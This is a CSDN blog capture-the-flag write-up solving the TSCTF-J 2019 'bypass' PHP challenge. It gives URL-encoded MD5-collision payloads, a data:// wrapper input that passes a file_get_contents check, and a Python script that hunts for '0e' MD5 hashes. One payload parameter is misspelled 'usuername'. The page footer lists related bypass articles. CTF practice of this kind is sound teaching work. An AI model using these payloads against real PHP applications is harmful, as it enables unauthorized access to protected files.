TSCTF-J 2019 bypass

最新推荐文章于 2021-10-24 16:28:11 发布
最新推荐文章于 2021-10-24 16:28:11 发布
阅读量756 收藏
点赞数
分类专栏: ctf writeup 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/105254696
版权

题目:

 <?php
    highlight_file(__FILE__);
    if(md5($_GET['pass']) == md5($_GET['username']) && $_GET['pass'] != $_GET['username']){
        if(strpos($_GET['username'],"tsctf") === 0){
            if(file_get_contents($_POST['file']) === "TSCTF-J{fake_flag}"){
                echo file_get_contents("/flag");
            }else{
                echo "Sorry1";
            }
        }else{
            echo "Sorry2";
        }
    }else{
        echo "Sorry3";
    }
Sorry3

这道题一共有三层,我们要绕过第一层可以用数组,或者md5值开头为0e的,但是绕过第一层,我们看到第二层我们GET传参的这个username传参的值开头必须是tsctf,我们就得想办法md5碰撞了。详细请看https://xz.aliyun.com/t/2232
在成功得到两个参数的值后我们就可以绕过第一第二层

pass=tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%06%D3%C1%90x%81d%7E%7C%A5%D1%0A%F5%97Y%C8%A3%FB%B8JFpG%00C%0EB%AD%D5A%C7%BDl%A3%F2%E1%E0%E9+%D7%8B%FA%CD1%0D%E6%F3i%7C%CB_%E7%D22%7C%E3pK%E3%D9%C4%0A%92%D4%23P%B3%8E1%7BG%D5%D7A%E6%F5f%0D%7E%1D%85%DEl%92N%0F%9B%DB%7C%8D%CFW%5BP%EDA%24%F8%C8j%02%D0%A2%FF%5B%9E%EBPQ%BE%7D%2B%1FOM%1D3u%7Eu%B5%E8%80%B2%E7%AE%D2%A2

usuername=tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%06%D3%C1%90x%81d%7E%7C%A5%D1%0A%F5%97Y%C8%A3%FB%B8%CAFpG%00C%0EB%AD%D5A%C7%BDl%A3%F2%E1%E0%E9+%D7%8B%FA%CD1%0Df%F4i%7C%CB_%E7%D22%7C%E3pK%E3Y%C4%0A%92%D4%23P%B3%8E1%7BG%D5%D7A%E6%F5f%0D%7E%1D%85%DEl%12N%0F%9B%DB%7C%8D%CFW%5BP%EDA%24%F8%C8j%02%D0%A2%FF%5B%9E%EBPQ%3E%7D%2B%1FOM%1D3u%7Eu%B5%E8%802%E7%AE%D2%A2

第三层:

if(file_get_contents($_POST['file']) === "TSCTF-J{fake_flag}")

用data伪协议

file=data://text/plain,TSCTF-J{fake_flag}

结果:
在这里插入图片描述

补充

脚本:

import hashlib
ts = "tsctf" #想要的字符串
def md5(key):
    m = hashlib.md5()
    m.update(key.encode('utf-8'))
    return m.hexdigest()
def check(plx):
    t = md5(plx)
    if t.startswith("0e"):

        return True
    else:
        return False

for i in range(1,1000000000):
    s = ts+str(i)

    print(s)
    if check(s):
        print(s)

在这里插入图片描述

西部壮仔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
samsung-activation-bypass-v2跳过-45.zip
09-05
标题 "samsung-activation-bypass-v2跳过-45.zip" 暗示这是一个针对三星设备的激活绕过工具的更新版本。这个压缩包可能包含了一系列文件,用于帮助用户绕过三星设备的激活过程,这通常是新设备首次启动时需要进行的...
x-frame-bypass:绕过X帧选项
05-10
标题“x-frame-bypass:绕过X帧选项”提示我们将讨论如何绕过这一安全机制。通常,`X-Frame-Options`有三个可能的值:`DENY`、`SAMEORIGIN`和`ALLOW-FROM`。 1. `DENY`:禁止任何网站将页面加载到IFrame中。 2. `...
第五届TSCTF-RE部分题解
WocW的博客
05-13 867
前言 这个周末参加了一下北邮的TSCTF,可以明确感觉到自己目前缺的是处理数据的工具或者是更高的技巧,许许多多的知识待补!有幸认识了在北邮读研的直系学长,也算是一些收获。 RE1 Checkin 分析 elf文件,IDA观察查看程序很简单。没仔细看,先上动调看看。 这里处理的第一步首先循环右移数据 ror flag[x],x 然后是直接进行已知字符对比验证。 exp a=[0x54,0xa9 ...
TSCTF-J 2019】relax
qtL0ng的博客
07-01 356
打开是个没用的网站,扫描一下~ 访问/robots.txt,发现三个文件: User-agent: * Disallow: /relax.php Disallow: /heicore.php Disallow: /flag.php 其中只有/relax.php里有东西,查看源码: 这个是aaencode代码,直接扔进控制台运行,或者在线解密:https://www.qtool.net/decode 整理得: $_ = $_GET['pw']; $__ = $_GET['file']; $___ =
TSCTF-J EasyF12
Lig_HossssT的博客
10-24 209
点击F12( 进入game1 发现移动并没有什么卵用 点击F12( 把disabled消掉 点击按钮进入game2 (或者直接进game2.php 点一次训练按钮会消失很久 所以 点击F12 fina1.php一片空白 点击F12 发现是md5碰撞 强弱碰撞都有 掏出fastcoll 得到flag ...
TSCTF 之web萌新瞎扯(二)
qq_41788666的博客
06-06 659
一,emmmmm    用扫描器扫描敏感目录,可以看到robots协议是开放的,查看robots协议 ,发现里面暴露了敏感目录backup以及phpinfo,访问backup发现里面有数据库备份文件,可以拿到管理员的账号和密码为admin和bupt666,试着去登录,发现**Warning!** login failed! admin's login ip must be 127.0.0.1 (a...
2018 TSCTF 之萌新瞎扯
qq_41788666的博客
05-31 663
一. Web1.   Are you in class根据hint猜测应该是构造xff头,查看源代码发现注释删掉注释符号,并构造192网段的xff头,提交得到flag2.   Buy flag进入页面发现要注册,注册页面对age进行了限制,对是否是数字进行了判断,猜测使用了php中的is_numeric函数,用16进制绕过,绕过之后再次使用账号进行登录,发现主页出现了变化,猜测应该是将age带入数...
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
这个安全漏洞被称为“Openfire Bypass”,它可能导致敏感信息泄露、服务拒绝或其他恶意攻击。 **漏洞概述** CVE-2023-32315 是一个认证绕过漏洞,允许未经授权的攻击者在没有正确凭证的情况下访问受保护的系统资源...
sqli-bypass靶场
最新发布
11-10
"sqli-bypass靶场"显然是一个专门用于测试和学习SQL注入漏洞绕过技术的平台。在这个靶场中,你可能会遇到各种防御机制,如输入过滤、参数化查询、存储过程等,而你需要学习如何在这些防御下找到漏洞并实施有效的SQL...
APS360-captcha-bypass
03-28
APS360可能是某个特定的验证码系统或者安全平台,而"captcha-bypass"则暗示了这个项目或教程的目标是研究和实现绕过这种验证码的方法。 在Jupyter Notebook中,我们可以利用Python语言及其丰富的库来分析和破解...
第二届TSCTFwriteup及心得-MISC
weixin_34014277的博客
05-12 155
1. Welcome_to_TSCTF 给了密码,访问文章输入密码得到: 差不多了,不往下做了 2.zip包伪加密 就是呢,压缩包让输入密码,打开包发现是个伪加密,这个要查zip的包结构,里面是明文的,但是目录结束后面的加密标识位是09,改成00就好,然后打开看见logo图片,把它放到stegslove里面分析Frame,得到 或者用binwalk直接分析它,这个我不会 3.我的节操碎一地 拼...
TSCTF-J 2021 [SimplePHP]
Ivyyyyyy1的博客
10-24 278
一、题目 进来看到的代码如下: <?php highlight_file(__FILE__); if ($_GET["secret"] != hash("md4", $_GET["secret"])) { die('乐<br>'); } if (!preg_match('/http/i', $_GET['file'])) { if (preg_match('/^i_am_bloodhound$/', $_GET['name']) && $..
第二届TSCTF比赛writeup及心得-Web
weixin_34335458的博客
05-11 202
1. 送分题 一开始真没明白为什么叫送分题,后来明白了,泪流满面。。我只想说,查看源码这个事情一辈子都不能忘。 还是推荐以后都用这个,就不会漏了 2.Do you know time 网页显示一张福利图片,下载下来,随便用二进制打开图片,翻到最后面,发现了代码,种子确定了,srand就没意义了,种子是由time()函数确定的,发到服务器上总要一点时间,所以我们用time()+...
xdoj1276(2017新生赛现场赛C题)
star_moon0309的博客
02-26 295
1276: Music List时间限制: 1 Sec  内存限制: 128 MB提交: 22  解决: 11[提交][状态][讨论版]题目描述据Glory说,williamchen的音乐品味非常差。据了解,williamchen的netease cloud music中只有一个歌单,里面有n首歌。williamchen每次听歌都按照歌单顺序从头开始听,一直听到某首歌后停止。现在给出m次willi...
2016 TSCTF 初赛
think_ycx的专栏
04-03 777
pwn1thoughts在第一个子函数布置shellcode(bss段的地址可定位)。puts("I'm zhouheiya, what about you?"); read(0, &format, 0x32u); printf(&format);此处存在bof,计算偏移覆盖返回地址为bss段中shellcode地址即可。puts("I'm datouerzi, what about you?");
2016 TSCTF 个人赛
think_ycx的专栏
04-03 679
pwn1thoughtsint sub_804857D() { int v1; // [sp+10h] [bp-20h]@1 setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); printf("=====Welcome to tsctf2016!=====\n\nPlease input your name:"); r
TSCTF-J 菜鸡的第一个HTML
Lig_HossssT的博客
10-24 210
打开题目 听到歌 点击F12 进入bilibili 由f12看到的内容可知 flag就是歌手名的罗马音nanawoakari 顺便说一句 这个题目描述就是用来生草的XDD
2019XCTF攻防世界之萌新入坑(time_formatter)
weixin_44113469的博客
04-11 1883
time_formatter
husky > pre-commit hook failed (add --no-verify to bypass)
06-28
这句话的意思是:husky > pre-commit hook 失败了(添加 --no-verify 来绕过)。 其中,husky 是一个 Git 钩子管理工具,pre-commit hook 是其中的一个钩子,用于在提交代码前执行一些操作,比如代码格式化、代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值